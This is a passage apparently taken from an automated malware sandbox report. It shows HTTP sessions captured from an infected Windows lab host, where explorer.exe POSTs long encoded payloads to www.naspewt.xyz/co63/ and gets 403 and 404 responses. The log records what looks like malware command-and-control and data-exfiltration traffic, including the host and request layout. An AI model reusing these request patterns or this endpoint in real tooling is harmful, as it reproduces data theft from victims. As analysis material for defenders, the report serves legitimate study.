qYxr~eVkKgdjmH0ynHYFnCIo0CBKWADj1NWO226RPF1E8gaJeJVJVt(VvTGUpHXeEbwlmXAJVSCH1QDhD8aLm7cGBrv3YBToiWxdC2278JblMKBS0QWuzBZhd2ILRNkytEPamXWauoWaf43i9fiEiZ6wXe85PPCIc2xJQ88JM9ESAOboBYDQ8SWVdwu5mswLYTEb3e7SWobjgdm1GWGIEqyC69D-4zImDMNO8vU27vhm8bR0QCdU2d(TFlnKOpyx2I1eK_i_fpM2WDjBk1oeEkfS1KtUSvLP2y1CgIXlJDZJ7kjUjngC5qiwkLQAwvp4DZUh9mP67nUiyBwZH5KJMg3cJ99Q0bOhrCli3fqQdIeOeXpyvp1TixS1W7(gDigd6AzA5X2AoKOt59ihe8tKaTScULvLIbjyFLsc8ge-eSCILDCrnHDCl-FfR-pV5odfGb0bKtSWbqeszc~L2Nd1C0kjJMJKOvvjXS8l4YwpBHYIYH1CVc8Q9eu1oL(-IOS1CQPKXuP65-mmGV7ahvp0vnFor64AnMTAVZkKmzaPehW5lRiXEjW95VhGH2RGy2FaS6zDRYTINOMG1mT8ON3RQcvf9cch5X6wIpKjcm~nfvFO4adfGo0jKv9353yP6eVjh187fi2xAX2NoQi9eNKKy2ZATME1e8snfJlXmo2n8dr0Vg~3HtJWIiUqLVLLImS8eguaaE7w4D42LTbP5dAMs47i30BKLuGt8Hn_wsFeXQ1dZ20B2FUG6vY7SA9BCed-jh0bAs1Z0wePjitz1UUk9w7ItYBzeRpwzvJJnP4VNl3Q5o0NlBcBxvTK3LCOHPmNp_b2wNJZZRr-JIoATLsWMt5T6IbqUGw47WMAlUObJNPDxOCQU4xu~9eh4_ndId2V~02EXKoJ9e2DWJS6PKJKUuCPGWIYp-Ny6sXnmoCzlVDEqcQ86g4E8Ehxz00a33(LA-ML5opfLMs9Jci5NI1QrXXt(cJN1BdO(-Uf4uHq(fcE1bZsLkoiB0LtdvNUnK9u~ZYfPAzN2cIIT2SLPYpVIqWmiMT4lAfQs7fyfY4OmLcYYKG3WQDij2fpoiUXEa5O8cFrjP1CdjFzXDfFwgLhOFzPe7XcSTOT6XyjmxqXO-fI4h6PeJdz2mkUI5~WzZ9FcpsyEuo1U38uiaGgWAovunzuDbXfeJVzbIQ11KYYQujgzQZN3DrWgwlOe3GjPJQ2~cX3ayybMtYHbAh0oifs99BfkjW9m7a_SynHMXE5MEc8jCyAQjxTPl25~rjw~SpSS7Bblf5GdaTzcB9o(PzBJ1iw6rpiQSJV0Tpd3FJEXhKxGVbXQS3m~Hs3R54-h6unNyUn0zB0hH581UegHjZmUGULddfuK21CIcIQJiLHwFrLFslyefUMd316lTGG5OwvQkmbUjFVDU34GrLMREIWcdBV4jNd7geDqcAIgRirScXPOTVtJFO8GQr8ttTsfA4OfwWXd1~oJTyJQP0tlwyX7qF-CIXpDSQ7mJAAqINhRa7o5O8EbFafqLGu(-zQkXdgfbtgWS3ED0amABHxOvIIwGgkUAYqcaBYtzuHXHCObOUSmkw44wnHBCUYiLQ3edhgLasaC5thEv(UBrUU6QUhrp2xDirIpfL6zbFStGGZBefCGVFF7MlRnvW7m9i2d6Yfr4qZwP2H1eAvZXsfpX~mxdcdybK1sy4l762OoVuC(RVzAfcSlJBPjsRuhvCPaA2DPlafkbfc~UO_c0gv45AufimIfTUTKKVq~ct19RXjqZqeeoE0V4LzUdLF1Utj(2X1V8B
                                                      Jul 20, 2023 11:46:17.414594889 CEST711OUTData Raw: 76 43 4d 6f 62 6a 4b 6b 41 4a 77 35 7e 5f 6c 31 32 49 43 51 50 42 54 58 45 32 4d 43 32 49 66 53 79 51 32 4c 62 62 62 79 48 47 6f 32 50 49 4b 2d 7e 53 59 5f 38 77 31 59 33 70 58 69 44 37 72 53 42 6b 41 70 79 63 37 74 59 68 75 79 6b 41 6c 63 65 56
                                                      Data Ascii: vCMobjKkAJw5~_l12ICQPBTXE2MC2IfSyQ2LbbbyHGo2PIK-~SY_8w1Y3pXiD7rSBkApyc7tYhuykAlceVDns7TWXh88myqFQ5o0bdYPgaZXHqkkRXIK8d~se3cJN1FHSMQuu-03imQgcoV9332retbbzp9EhOfq44mlo3w5luuyzQSjLgB3gPADeefkc4BT7JqXNL81ljVYZjrqv2Un5h(vljV3bSPh7yklSxDVAafeCqS19MJ
                                                      Jul 20, 2023 11:46:17.414594889 CEST716OUTData Raw: 69 52 79 62 71 78 73 47 63 63 41 76 6d 41 34 44 71 69 7e 46 5a 52 69 32 6f 77 32 66 67 6d 32 6f 71 6c 6a 73 79 78 30 65 46 59 67 64 77 61 45 4f 32 64 42 69 68 63 28 43 54 67 70 33 6a 6f 43 6c 66 77 48 6b 6a 33 5a 63 62 76 52 2d 4a 4b 65 57 4b 38
                                                      Data Ascii: iRybqxsGccAvmA4Dqi~FZRi2ow2fgm2oqljsyx0eFYgdwaEO2dBihc(CTgp3joClfwHkj3ZcbvR-JKeWK8QDxz4Y60vxJ4nFl0MZqeDEC-h7y7PavMZTXcTEMhtlLvbfY8rLjPMuK68gIyy5(oOEsMmXgOQV2jxR8UM0yKJMCH3xp9vomIXoAxCr2J58KztZokHLEVJgaMQ6WKnp~YwIkVKOUvvmolxTZ-O7rr6LHup6E75Giqy
                                                      Jul 20, 2023 11:46:17.414740086 CEST726OUTData Raw: 7a 68 5a 33 4e 77 74 6b 35 33 62 79 64 7a 45 4c 59 47 36 77 34 73 71 4a 39 39 31 79 31 43 73 59 4a 6a 64 6f 62 73 4d 6d 58 38 51 5f 55 34 66 71 53 7a 4d 77 72 34 54 74 4a 57 75 56 63 58 7a 4f 6a 72 41 54 6d 6c 68 57 53 47 71 41 67 36 30 39 39 72
                                                      Data Ascii: zhZ3Nwtk53bydzELYG6w4sqJ991y1CsYJjdobsMmX8Q_U4fqSzMwr4TtJWuVcXzOjrATmlhWSGqAg6099rWdio7KjdiO(Os7Pf2Cb0cHM1RQMotO(9(CEwoSR1SQSkecwuicBvEh0V~bSMyrzSsHTqPq4VWYF0Oe(X2-umKXhSC55TvB5AXOEp1CAImHW1p8BBVFtOj1wR0iKfwzDFFteR7rbCGzuwTD1WEIXcmZsOny7Uj726S
                                                      Jul 20, 2023 11:46:17.414844036 CEST731OUTData Raw: 75 76 57 5f 75 73 4c 64 28 4b 44 65 28 53 7a 5f 69 75 77 61 43 68 65 78 4e 6a 63 48 73 7a 71 50 45 4d 51 34 74 32 4e 37 6f 72 75 32 65 44 50 31 54 67 69 6f 28 7a 44 44 47 7a 54 4b 4b 5a 78 48 61 62 6a 78 62 77 6a 34 77 48 37 63 28 56 53 59 6e 77
                                                      Data Ascii: uvW_usLd(KDe(Sz_iuwaChexNjcHszqPEMQ4t2N7oru2eDP1Tgio(zDDGzTKKZxHabjxbwj4wH7c(VSYnw2r~MRlH5pLj0yvUbHYjg53SOn3o_A9~XjtFOXIUr5iDehq2V64fuEPApPzz6N1cHR5cLc0HL6V0s50hyjHskAviNf269IBM0FaPOaioyHaLbLMINFk5klXUOsgGtK_RVTfDruyrT1_POkVG3IyXfsfb9b-JXlat0Y
                                                      Jul 20, 2023 11:46:17.438082933 CEST735OUTData Raw: 31 74 79 39 78 50 6a 79 66 4b 54 4c 41 36 34 6f 73 68 66 49 79 65 44 4a 4a 31 61 78 54 55 74 6a 68 58 72 4e 55 6b 74 46 46 78 63 4f 6d 45 49 69 66 46 45 55 66 52 74 62 4c 6b 44 5a 68 78 71 64 73 35 6f 72 34 62 4c 4a 66 6e 4e 51 73 34 68 41 42 6d
                                                      Data Ascii: 1ty9xPjyfKTLA64oshfIyeDJJ1axTUtjhXrNUktFFxcOmEIifFEUfRtbLkDZhxqds5or4bLJfnNQs4hABmNxgPYPOefwgAiM47k8UolF5UjO0uZ1iFxEW2maLdMlMJwtTnNiu7i9hD8n1ql13jJ34EE7X0aVqO7iFQwJNQG7Y5yPB_3V4AAFcVqkDLMO1gyqyXB_k3UkH96Q2H9y13y1Z3daE7fbBMgHk_LxBq(7whlFZt1kntU
                                                      Jul 20, 2023 11:46:17.438174963 CEST745OUTData Raw: 4c 57 4c 57 65 75 72 6e 70 51 32 72 47 53 46 56 4f 65 59 43 52 47 6e 7a 38 33 53 4a 75 5f 63 39 71 43 6e 58 55 61 52 75 43 59 33 62 74 38 31 4c 46 67 37 42 4f 49 76 62 73 31 43 49 51 67 57 4c 65 42 52 49 6c 33 4f 33 6c 58 44 55 33 63 36 42 5a 54
                                                      Data Ascii: LWLWeurnpQ2rGSFVOeYCRGnz83SJu_c9qCnXUaRuCY3bt81LFg7BOIvbs1CIQgWLeBRIl3O3lXDU3c6BZTnmr4xAQER1U-Fx61cV8W0wZmSHut2eqq5Mcm3Da5jzuPd7iEyRSbMei0g6J30gnv~OTOZcvmf08vq0CKsOFWzSKk98B6qs7GCb0BD0QkjnC7Da4gcXYuCHoTvJpntkaemfKp03s44IT_jPjK1vDt6AJo2FFo1X2rE
                                                      Jul 20, 2023 11:46:17.438226938 CEST753OUTData Raw: 4a 79 6e 4a 7a 76 74 49 74 41 35 39 52 4c 41 66 69 7a 56 39 59 72 6b 52 6b 6c 6e 6f 6d 6a 61 37 28 59 4b 65 78 7a 6c 6e 53 63 65 6d 71 76 63 51 53 73 36 70 48 73 4b 4c 65 4a 77 5a 28 62 73 4c 77 72 51 4e 6f 4f 7e 52 66 59 69 39 36 66 46 4e 67 51
                                                      Data Ascii: JynJzvtItA59RLAfizV9YrkRklnomja7(YKexzlnScemqvcQSs6pHsKLeJwZ(bsLwrQNoO~RfYi96fFNgQJrh3r5agkZazZjqHUchmwihoi3(bjMaSNUlBkdfKNqCWEWUAES(wKCvbEY3w41HN6gGxn5eg102Srcp8(oKtJQ3ZUQKNnYcjtMEHFTFy4qvJcpsWTWe1siqfa5Q83VtfS9wvf99u2XRnVNST82IOiuP15QDAnhP4i
                                                      Jul 20, 2023 11:46:17.438226938 CEST755OUTData Raw: 34 34 67 4a 59 46 61 69 7a 57 4d 55 31 6c 79 52 38 62 78 63 6d 45 36 71 41 35 32 6d 4f 6c 53 6d 62 4a 4b 71 75 37 31 6a 47 4e 59 52 4c 2d 4a 49 5a 41 6f 61 77 31 33 76 33 69 78 79 35 57 70 78 72 52 6e 78 41 4b 35 56 6f 56 4b 32 34 70 4e 45 4e 70
                                                      Data Ascii: 44gJYFaizWMU1lyR8bxcmE6qA52mOlSmbJKqu71jGNYRL-JIZAoaw13v3ixy5WpxrRnxAK5VoVK24pNENp3xemgLUlGhqBRWA9qz1TM4AK9LTI9zleSQoxavAZQC7IXybFV3EDHVSAvv31j3paD1s4OcADz7DuYIOQwOfODikCTBIrKf4BcedBhX7_8CGn0tuqmwbuMry2XyAoblACzkyrsqG3pmBZnyQn~evHh1Idx2yEdTkzm
                                                      Jul 20, 2023 11:46:17.438263893 CEST760OUTData Raw: 39 47 51 4a 49 47 77 38 50 54 51 64 48 30 6e 6a 67 42 7a 39 45 5f 64 5f 52 6e 47 30 4c 41 65 75 6c 6f 56 44 4d 6e 4b 61 48 6e 65 52 49 55 36 62 63 44 4f 64 43 6b 46 69 35 47 6c 54 31 72 70 61 43 68 45 38 62 63 78 56 7a 71 6f 4e 66 64 53 42 32 42
                                                      Data Ascii: 9GQJIGw8PTQdH0njgBz9E_d_RnG0LAeuloVDMnKaHneRIU6bcDOdCkFi5GlT1rpaChE8bcxVzqoNfdSB2BAy4cmmLf~t8e2jgWf1H54A54RutV0h~JaZ86zJpuyc45~TaxAvZAz56mRvzjEcSCaVqeXNDLE65tBmwyimv-KnjxBgMjNmkhFxh6SdLmJ4WFWCz6TZeE2ElIeBfkzcU2I0jD4Xf1UjSDahAhuu82KWAfkIxcAqauD
                                                      Jul 20, 2023 11:46:17.438699007 CEST763OUTData Raw: 46 66 77 62 56 67 7e 66 76 46 57 31 6f 72 62 47 46 6e 51 53 4d 6a 72 61 45 43 68 6e 32 58 76 49 31 4e 48 6c 32 39 50 77 36 6d 6d 71 28 6f 76 65 4f 4f 74 56 38 52 34 39 49 71 67 5f 33 34 58 78 59 74 42 64 75 58 69 46 46 35 70 44 36 71 74 68 33 48
                                                      Data Ascii: FfwbVg~fvFW1orbGFnQSMjraEChn2XvI1NHl29Pw6mmq(oveOOtV8R49Iqg_34XxYtBduXiFF5pD6qth3H4oksOwlSJTFr88~Wuw1h9CbdF_Ccd5NvYsaDPeJOC4dG5lzSOzpATlLDpxiJlI9Uy9L2~fynvDtofb~jZIWgSj2e8wAjIaS165W-BPr9YxF0kJJeY1fgATuiVoPUhpZSI0AP935b00ajuaMeLLSLLH3WCfuJIfkb3
                                                      Jul 20, 2023 11:46:17.509630919 CEST850INHTTP/1.1 403 Forbidden
                                                      Content-Length: 146
                                                      Content-Type: text/html
                                                      X-Wix-Request-Id: 1689846377.47140507045121470
                                                      X-Content-Type-Options: nosniff
                                                      Server: Pepyaka/1.19.10
                                                      Accept-Ranges: bytes
                                                      Date: Thu, 20 Jul 2023 09:46:17 GMT
                                                      X-Served-By: cache-mxp6957-MXP
                                                      X-Cache: MISS
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIJqzH7v57uBf+JE84tfrPJH,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      18192.168.2.549729184.94.215.14080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:46:39.806387901 CEST852OUTPOST /co63/ HTTP/1.1
                                                      Host: www.naspewt.xyz
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.naspewt.xyz
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.naspewt.xyz/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 7a 58 4b 4e 7e 6e 75 73 57 6c 52 6c 76 68 31 65 76 41 61 62 57 61 77 4f 39 63 33 46 4d 46 64 35 4a 71 77 33 6c 6d 74 5a 33 79 41 30 45 6c 42 72 47 34 4c 39 54 4c 32 36 37 54 32 35 4f 73 69 66 6f 76 6f 45 65 52 62 73 46 36 75 61 37 53 4e 33 4b 38 59 53 32 69 6a 62 58 57 6a 47 5a 35 41 65 35 46 57 65 64 31 4a 68 36 38 36 64 59 43 79 79 33 6b 45 2d 70 58 46 37 68 63 76 35 71 49 4b 52 44 71 4e 6c 54 35 74 4d 63 68 55 39 62 76 78 30 52 38 44 34 7e 67 36 6c 59 4c 76 38 79 69 62 31 76 4f 73 66 44 6b 71 71 7e 70 56 41 41 43 7a 36 43 69 67 43 6a 48 63 74 38 4d 32 38 31 56 74 31 65 4a 7e 44 4d 55 4b 77 72 65 5a 56 51 74 6d 61 67 58 4f 62 4a 42 6d 4b 51 66 4e 4b 77 6c 74 56 36 51 66 37 4a 47 5a 45 6a 64 62 36 68 6a 63 53 70 58 4f 5f 79 63 6d 37 59 66 46 75 67 69 45 4b 68 6c 38 43 4d 75 63 62 57 6a 44 61 62 47 6f 53 44 59 4c 78 52 32 53 67 33 42 74 58 58 47 49 74 5a 31 69 54 71 39 4b 63 4f 49 4d 35 73 71 44 66 5a 34 6a 6f 73 61 6d 61 28 6e 4c 75 51 73 77 67 53 53 30 6a 6e 30 59 4d 35 4e 65 4a 30 49 4d 6e 28 4c 32 77 57 74 72 57 32 46 77 74 45 78 6b 4a 5a 4e 53 5a 58 4e 58 73 34 67 73 67 45 57 6b 39 63 6a 53 78 33 4a 4b 49 76 67 4d 47 72 37 71 2d 74 37 32 49 53 2d 43 4c 4d 5f 69 6b 73 57 4f 58 33 4a 53 4a 54 46 7e 78 37 74 37 64 47 74 72 61 4f 61 28 50 5a 6f 36 53 64 50 44 38 4d 53 6d 50 6a 4e 49 46 7a 31 59 35 35 41 31 4e 49 4c 39 4f 72 2d 32 38 58 35 43 49 4f 33 72 5f 50 78 57 48 56 4a 39 6e 74 73 6b 44 46 6d 4e 5a 49 67 69 77 49 4d 6c 69 77 6a 57 61 36 2d 31 35 4b 79 33 52 49 33 59 49 78 36 4f 30 6e 45 30 77 62 45 28 54 4c 38 57 72 5a 67 63 69 4c 74 47 31 6b 57 4b 35 75 78 41 51 6b 37 70 5f 33 50 63 65 6b 43 69 7a 44 53 51 4f 69 66 78 71 7a 57 7e 30 4e 73 6c 50 41 58 6d 73 59 54 74 6f 46 35 43 5f 44 6d 64 71 70 62 58 30 73 46 41 38 67 4f 32 67 43 6a 73 58 35 37 6a 59 36 45 57 36 48 78 56 35 31 34 48 68 65 47 34 6f 46 73 65 68 37 34 30 50 55 4f 34 44 51 37 6c 2d 66 49 74 4d 70 53 65 48 71 4b 6d 63 46 7a 55 4b 30 48 79 46 66 43 6f 51 61 6b 35 49 62 57 44 4a 6b 6b 6a 4e 4d 37 49 49 66 31 65 69 35 6b 64 4b 30 57 6e 7a 54 6d 45 43 78 39 5a 5f 77 78 34 6d 4b 78 38 54 31 66 4c 36 63 78 59 53 4b 77 58 64 62 4d 55 50 76 63 47 53 78 32 6f 53 6c 78 47 46 4d 65 42 75 7e 51 75 72 6e 6d 57 66 61 68 55 43 4f 4b 54 6a 63 43 5a 54 4d 37 48 72 42 6d 54 77 57 6d 46 4a 65 6a 45 33 37 5f 73 70 39 6b 55 44 50 30 53 35 4e 57 52 30 30 71 42 69 68 59 7a 31 35 4a 79 31 4c 48 77 33 6d 4e 53 61 4a 77 39 79 54 6a 35 6d 4f 33 35 70 5a 38 67 49 67 4a 66 6c 43 52 73 75 57 73 79 61 42 78 66 51 4e 54 68 68 7e 6f 6c 62 5a 54 4e 49 46 6a 36 4b 66 76 6d 46 48 76 46 66 71 49 58 42 74 70 44 68 28 7a 6c 53 71 54 37 46 6b 63 37 4c 75 54 4e 4f 73 66 34 68 72 4e 4d 7a 48 67 7a 66 74 50 48 33 53 6a 66 6f 73 34 35 4d 71 54 5a 72 45 49 45 42 50 39 54 4d 39 55 68 67 57 50 70 51 6c 71 63 6e 52 47 68 79 49 38 50 4a 44 30 65 71 74 4b 67 50 66 68 31 53 58 66 6a 48 79 44 64 51 4c 79 48 4c 4a 6d 5a 31 55 75 5a 65 70 6b 4d 52 38 52 6f 64 79 62 59 43 38 57 76 6e 66 54 61 56 33 62 6c 72 75 47 7a 54 43 61 69 75 41 66 36 41 61 52 74 36 55 6a 54 32 4e 7a 6b 53 65 75 30 31 57 72 47 6d 57 30 7e 52 41 75 65 66 49 37 76 69 35 51 54 30 66 33 72 41 55 73 63 72 4a 5a 4c 44 55 55 61 68 72 4a 7a 68 45 47 4f 4b 72 57 68 4b 32 32 34 33 65 44 72 50 46 62 6b 46 6e 45 78 61 43 58 79 36 59 32 6e 33 6e 44 34 49 47 42 62 41 67 57 57 55 53 6f 34 68 76 51 64 55 53 79 38 71 33 6b 71 47 6e 6e 63 4f 4d 6a 51 67 49 74 63 37 55 75 39 52 51 76 6b 43 47 6b 4f 48 53 33 70 4a 73 65 54 4e 37 2d 28 6c 4a 63 37 59 67 58 44 68 52 54 48 37 39 36 79 7a 79 77 73 61 4f 43 42 4d 56 55 52 75 33 46 4f 6a 56 36 44 37 71 6c 66 5f 46 76 4a 53 4a 51 59 65 6c 64 48 6b 78 43 38 31 58 4d 4a 7a 46 68 45 53 4f 65 34 6b 48 59 75 36 6b 5f 72 65 47 4f 61 57 77 73 44 39 45 42 69 50 55 56 6e 42 4a 65 4b 44 62 4d 37 62 63 2d 67 2d 38 7a 6b 58 4c 70 4d 53 73 59 31 43 4d 45 78 4d 33 43 45 5f 30 79 38 71 49 45 4d 4d 37 65 6b 51 72 43 37 39 7a 79 4a 2d 7e 6b 53 33 37 51 6e 53 4e 55 34 64 5a 45 37 39 73 47 49 36 6a 65 47 30 70 33 4a 6b 6a 62 56 37 6f 69 6d 5a 69 74 59 53 66 6d 48 30 4b 5a 72 41 37 37 35 41 32 36 70 2d
                                                      Data Ascii: aJElwV=zXKN~nusWlRlvh1evAabWawO9c3FMFd5Jqw3lmtZ3yA0ElBrG4L9TL267T25OsifovoEeRbsF6ua7SN3K8YS2ijbXWjGZ5Ae5FWed1Jh686dYCyy3kE-pXF7hcv5qIKRDqNlT5tMchU9bvx0R8D4~g6lYLv8yib1vOsfDkqq~pVAACz6CigCjHct8M281Vt1eJ~DMUKwreZVQtmagXObJBmKQfNKwltV6Qf7JGZEjdb6hjcSpXO_ycm7YfFugiEKhl8CMucbWjDabGoSDYLxR2Sg3BtXXGItZ1iTq9KcOIM5sqDfZ4josama(nLuQswgSS0jn0YM5NeJ0IMn(L2wWtrW2FwtExkJZNSZXNXs4gsgEWk9cjSx3JKIvgMGr7q-t72IS-CLM_iksWOX3JSJTF~x7t7dGtraOa(PZo6SdPD8MSmPjNIFz1Y55A1NIL9Or-28X5CIO3r_PxWHVJ9ntskDFmNZIgiwIMliwjWa6-15Ky3RI3YIx6O0nE0wbE(TL8WrZgciLtG1kWK5uxAQk7p_3PcekCizDSQOifxqzW~0NslPAXmsYTtoF5C_DmdqpbX0sFA8gO2gCjsX57jY6EW6HxV514HheG4oFseh740PUO4DQ7l-fItMpSeHqKmcFzUK0HyFfCoQak5IbWDJkkjNM7IIf1ei5kdK0WnzTmECx9Z_wx4mKx8T1fL6cxYSKwXdbMUPvcGSx2oSlxGFMeBu~QurnmWfahUCOKTjcCZTM7HrBmTwWmFJejE37_sp9kUDP0S5NWR00qBihYz15Jy1LHw3mNSaJw9yTj5mO35pZ8gIgJflCRsuWsyaBxfQNThh~olbZTNIFj6KfvmFHvFfqIXBtpDh(zlSqT7Fkc7LuTNOsf4hrNMzHgzftPH3Sjfos45MqTZrEIEBP9TM9UhgWPpQlqcnRGhyI8PJD0eqtKgPfh1SXfjHyDdQLyHLJmZ1UuZepkMR8RodybYC8WvnfTaV3blruGzTCaiuAf6AaRt6UjT2NzkSeu01WrGmW0~RAuefI7vi5QT0f3rAUscrJZLDUUahrJzhEGOKrWhK2243eDrPFbkFnExaCXy6Y2n3nD4IGBbAgWWUSo4hvQdUSy8q3kqGnncOMjQgItc7Uu9RQvkCGkOHS3pJseTN7-(lJc7YgXDhRTH796yzywsaOCBMVURu3FOjV6D7qlf_FvJSJQYeldHkxC81XMJzFhESOe4kHYu6k_reGOaWwsD9EBiPUVnBJeKDbM7bc-g-8zkXLpMSsY1CMExM3CE_0y8qIEMM7ekQrC79zyJ-~kS37QnSNU4dZE79sGI6jeG0p3JkjbV7oimZitYSfmH0KZrA775A26p-GwYZtfID3-6NQCr1obu4xrOhM40EEkjw3S7N0QhKSv1f3wmBh61ugHPPMlJV410xcdZcLidGkwXu~LmsUmAvizQ6TdTRrxOAxjNC~j5bP7d3qjxBauV1yA).KOy2(53
                                                      Jul 20, 2023 11:46:40.046875954 CEST853INHTTP/1.1 404 Not Found
                                                      Date: Thu, 20 Jul 2023 09:46:39 GMT
                                                      Server: Apache/2.4.29 (Ubuntu)
                                                      Content-Length: 277
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 61 73 70 65 77 74 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.naspewt.xyz Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      19192.168.2.549730184.94.215.14080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:46:40.497159958 CEST866OUTPOST /co63/ HTTP/1.1
                                                      Host: www.naspewt.xyz
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.naspewt.xyz
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.naspewt.xyz/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 7a 58 4b 4e 7e 6a 7a 66 54 56 6c 30 35 54 42 66 69 53 6a 57 53 37 41 51 31 2d 79 48 42 7a 30 4a 58 4b 52 63 6c 6e 39 46 72 33 6b 63 42 46 52 72 50 62 79 37 64 4c 32 31 39 54 32 2d 59 64 65 6e 68 5a 49 4d 65 51 76 4b 46 36 6d 46 31 54 38 5f 64 4f 78 51 30 79 76 4a 4c 69 4b 46 49 76 4d 52 35 6e 71 4a 57 55 42 68 31 73 4f 66 57 78 4b 6c 30 51 55 69 6d 58 4a 39 71 35 62 4b 67 66 65 38 43 4a 68 68 61 63 68 67 4c 41 63 32 56 75 77 54 51 66 6a 38 77 77 7e 6d 53 73 6e 36 78 44 47 4d 28 66 73 48 4e 41 47 44 78 34 68 47 4c 78 72 4d 43 67 4d 72 35 33 74 52 79 75 57 74 34 44 41 4f 61 4a 4b 44 4e 6c 44 72 67 35 74 54 63 4e 48 48 6a 45 57 70 50 77 32 6a 58 61 68 4a 75 6c 4e 57 30 79 48 72 52 47 78 52 68 63 54 4d 34 45 35 6c 71 33 4b 4b 31 39 57 61 43 73 30 32 67 52 42 4d 6d 6a 73 4b 53 38 5a 7a 56 52 50 73 51 33 4a 6c 54 4a 50 35 51 47 6a 4e 39 69 39 57 5a 79 38 6d 55 58 61 44 6c 38 32 76 44 6f 56 34 6d 4f 76 72 5a 34 76 67 73 36 53 38 7a 48 4b 6c 64 4e 52 69 53 53 73 6a 6e 77 51 63 37 34 75 4a 31 74 4a 72 35 4e 4b 7a 49 39 71 49 6f 6b 64 6c 44 43 41 57 5a 4e 69 4e 58 39 66 73 35 6a 49 67 42 32 30 79 51 44 53 78 68 35 4b 47 76 67 4d 65 72 37 71 62 74 35 47 55 54 2d 4b 4c 4f 36 7e 71 74 67 44 35 78 62 4f 48 63 46 7e 31 32 4d 37 39 4e 4d 48 69 4f 64 53 4b 5a 4a 57 53 63 4d 50 7a 65 47 36 4c 72 38 49 61 37 55 41 70 67 77 38 41 49 4c 78 58 71 38 50 58 53 63 36 64 50 33 72 38 41 6c 33 62 48 34 38 6d 75 4f 38 63 4a 46 74 49 50 45 44 34 49 73 68 78 77 41 71 65 35 34 74 74 66 69 6a 72 4e 46 30 55 39 71 28 55 6a 43 41 34 55 56 54 42 61 73 43 37 49 31 30 7a 61 4f 6d 5f 6b 6c 69 6a 6a 30 67 36 70 65 73 50 28 73 5a 47 68 44 53 63 49 44 59 7a 67 4c 35 45 71 67 36 61 4a 38 70 63 45 6b 44 33 63 78 4d 75 52 36 75 48 54 58 74 72 68 49 6e 76 6b 56 63 70 68 4f 37 77 56 33 64 76 72 62 33 36 78 52 4c 4c 4b 33 78 61 7a 36 58 44 58 43 70 46 41 50 36 51 74 50 46 5a 5a 4c 55 4c 5a 4b 5a 64 4a 75 77 30 28 68 36 71 68 4f 76 37 49 7a 6c 4a 36 41 36 41 62 54 51 68 56 30 42 71 50 79 43 66 69 6a 33 47 66 37 38 35 50 6b 37 4b 30 6d 63 38 77 31 69 5a 5a 6b 35 36 28 4e 39 64 36 6a 74 42 4c 57 49 39 6b 35 48 48 45 44 30 54 56 41 36 34 58 4f 55 4f 74 2d 36 37 79 6e 39 6e 68 47 33 54 4e 70 6c 50 7a 6b 